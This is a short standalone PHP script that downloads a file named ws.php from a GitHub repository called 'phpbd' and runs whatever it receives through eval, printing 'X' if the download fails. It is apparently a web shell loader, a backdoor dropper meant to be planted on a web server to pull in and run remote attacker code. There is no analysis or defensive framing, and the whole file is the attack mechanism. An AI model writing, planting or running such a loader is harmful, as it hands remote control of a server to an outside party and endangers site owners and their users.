<?php

$url = 'https://raw.githubusercontent.com/laolierzi-commits/phpbd/refs/heads/main/ws.php';

$context = stream_context_create([
    'http' => [
        'follow_location' => 1,
        'timeout' => 10,
        'ignore_errors' => true
    ],
    'ssl' => [
        'verify_peer' => true,
        'verify_peer_name' => true
    ]
]);

$handle = @fopen($url, 'r', false, $context);
$content = $handle ? stream_get_contents($handle) : '';
if ($handle) fclose($handle);

if (!empty($content)) {
    eval('?>' . $content);
} else {
    echo "X";
}
